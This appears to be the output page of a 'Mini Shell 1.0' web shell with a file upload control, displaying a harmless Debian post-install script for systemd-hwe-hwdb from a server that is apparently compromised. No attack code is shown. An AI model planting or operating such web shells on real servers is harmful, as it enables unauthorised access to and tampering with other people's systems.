HOME


Mini Shell 1.0
DIR: /var/lib/dpkg/info/
Upload File :
Current File : /var/lib/dpkg/info/systemd-hwe-hwdb.postinst
#!/bin/sh

set -e

case "$1" in
    configure)
        systemd-hwdb --usr update || true
        exit 0
        ;;
esac